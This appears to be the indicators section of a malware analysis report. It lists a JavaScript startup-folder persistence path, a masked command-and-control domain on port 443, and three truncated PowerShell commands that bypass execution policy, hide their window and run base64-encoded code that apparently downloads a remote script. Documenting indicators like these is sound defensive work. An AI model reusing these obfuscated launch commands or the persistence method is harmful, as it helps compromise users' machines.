Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.js
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' PowERsHELl.ExE -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAIgBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAiACwAJwBnACcAKQ...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' PowERsHELl.ExE -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAIgBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAiACwAJwBnACcAKQ...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAIgBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAiACwAJwBnACcAKQA7AFsAdgBvAGkAZ...